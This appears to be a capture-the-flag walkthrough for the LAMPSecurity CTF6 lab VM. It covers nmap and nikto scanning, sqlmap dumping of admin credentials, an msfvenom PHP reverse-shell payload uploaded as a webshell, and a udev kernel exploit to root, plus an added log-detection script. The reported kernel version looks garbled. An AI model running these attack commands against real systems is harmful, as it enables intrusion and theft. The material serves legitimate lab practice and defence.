Hello readers, today we are going to solve LAMPSecurity CTF6. This is a beginner-level challenge. In this walkthrough we are going to
exploit the VM and gain root privileges. Let's begin and get root access.
List of actions
- Reconnaissance of the target
- Web application enumeration
- SQL injection using sqlmap
- Web application exploitation using backdoor
- Get the restricted shell access of the target
- Upload exploit
- Gain root privilege
1 Reconnaissance
First of all we have to discover the target VM using the
netdiscover tool in Kali.
The search results show our target VM.
Now we know our target VM's IP, so let's scan it with nmap to
discover the open ports and the services running on the target. To do so,
execute the command below and wait for the result.
nmap -sT -O -p- 172.16.2.93
From the above screenshot we can observe that a web server is
running on port 80. So let's open the website and enumerate it for further
information.
2 Web application enumeration
The above website is running on port 80. Now let's scan the
website using nikto and find out whether any vulnerability exists.
The scan results give us some fruitful information. According to
the results, directory indexing is enabled on the paths below, which may give us
some sensitive information about the web application.
- /files/
- /sql/
Let’s enumerate those paths and find out if we get any
information in it.
From the above screenshot we get to know this directory
contains some image files. Later we will see how to upload a backdoor within
it.
From the above screenshot we can observe that a file named
db.sql exists. Let's open the file and see if we can get any login credentials.
From the above screenshot we can see that, partway through
the file, the credentials for admin were written in plaintext.
Username = admin
Password = adminpass
3 SQL injection using sqlmap
We can also try to get the credentials with sqlmap. So let's
get the admin password using sqlmap as well.
Type the following sqlmap command in the console and hit
enter.
sqlmap -o -u "http://172.16.2.93/?action=login" --forms --dbs
From the above command we have got the databases below.
Our target is cms, so
let's enumerate the database and find out the tables inside. To do that, execute
the command below.
sqlmap -o -u "http://172.16.2.93/?action=login" --forms -D cms --tables
As a result we have got three results below.
Now get the data inside the user table. To do that,
execute the command below.
sqlmap -o -u "http://172.16.2.93/?action=login" --forms -D cms -T user --dump
We have successfully got the admin credentials.
As we have got the admin credentials, let's try to log in
to the application's admin panel.
We have successfully logged in to the admin account.
4 Web application exploitation using backdoor
Now, using the Add Event page, we will try to upload the
backdoor and get a shell on the server.
To do that, enter the command below on the Kali machine.
msfvenom -p php/meterpreter/reverse_tcp lhost=172.16.2.155 lport=4444 -f raw
After getting the result, copy the code from <?php to
die(); and save it on the desktop with the name shell.php.
Now let's move to the application and try to upload the
shell.php file.
After that, come back to the Kali machine, start
msfconsole and execute the commands below to get the meterpreter session.
Now come back to the web application and browse to the path
below to execute the uploaded file shell.php.
172.16.2.93/files/shell.php
We have successfully got the meterpreter session.
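The web-facing steps so far (the nikto scan, the db.sql download, sqlmap against the login form and the request that runs shell.php from /files/) all appear in the target's Apache access log. The following added example, which is not part of the original walkthrough, flags them from the defender's side; it assumes the Apache combined log format, and the sample log lines and the 172.16.2.40 client are constructed.

```python
import re
from collections import defaultdict

# Apache "combined" access-log format (assumed).
LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
UPLOAD_DIR = "/files/"  # upload directory named in the walkthrough
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)(\?|$)", re.I)
DUMP_EXT = re.compile(r"\.(sql|bak|dump)(\?|$)", re.I)
SCANNER_UA = re.compile(r"sqlmap|nikto", re.I)

def findings(lines):
    """Map each client IP to the set of suspicious behaviours seen from it."""
    out = defaultdict(set)
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not a combined-format line
        ip, path = m["ip"], m["path"]
        if SCANNER_UA.search(m["ua"]):
            out[ip].add("scanner-user-agent")
        if m["status"] != "200":
            continue  # the checks below only count requests that were served
        if DUMP_EXT.search(path):
            out[ip].add("db-dump-download")
        if path.startswith(UPLOAD_DIR) and SCRIPT_EXT.search(path):
            out[ip].add("script-run-from-upload-dir")
    return dict(out)

# Constructed sample lines; timestamps, sizes and user agents are made up.
SAMPLE_LOG = [
    '172.16.2.155 - - [01/Jan/2024:10:00:01 +0000] "GET /sql/db.sql HTTP/1.1" 200 4312 "-" "Mozilla/5.0"',
    '172.16.2.155 - - [01/Jan/2024:10:05:10 +0000] "POST /?action=login HTTP/1.1" 200 1532 "-" "sqlmap/1.0 (constructed)"',
    '172.16.2.155 - - [01/Jan/2024:10:20:44 +0000] "GET /files/shell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '172.16.2.40 - - [01/Jan/2024:10:21:00 +0000] "GET /files/logo.jpg HTTP/1.1" 200 20480 "-" "Mozilla/5.0"',
    '172.16.2.40 - - [01/Jan/2024:10:22:00 +0000] "GET /files/test.php HTTP/1.1" 404 210 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, labels in findings(SAMPLE_LOG).items():
        print(ip, sorted(labels))
```

A served script under /files/ also points at the fix: the upload directory should not execute PHP, and database dumps such as /sql/db.sql should not sit under the web root.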
Now run the ‘sysinfo’ command to get the server's kernel
information, so that we can search for an exploit to escalate to root
privileges.
As per the above
screenshot, the kernel version of the target system is 1.6.18-92. Let's search
for an exploit on the internet.
After multiple searches I found the exploit below on
exploit-db.
Let's download the exploit and upload it to the /tmp
directory of the target system.
5 Upload exploit
To do that, follow the steps below.
6 Get the restricted shell access of the target
After successfully uploading the file, let's run the ‘shell’
command, then type the Python script below in the shell and execute it to get
restricted access to the target's bash command prompt.
Now go to the /tmp folder and set the permissions on the file
using the ‘chmod’ command.
7 Gain root privilege
Now run the command below to get the netlink ID, and after
that execute the udev.sh file with the ID as its argument.
Congratulations!! We have successfully got root access.
But keep one small thing in mind: you might have to execute the shell script
more than once to get root access. As you can see, I tried more than
once to be sure the script executed successfully. If you have any
further doubts about this, please let me know in the comment section. Thanks for
reading my article. Happy hacking!!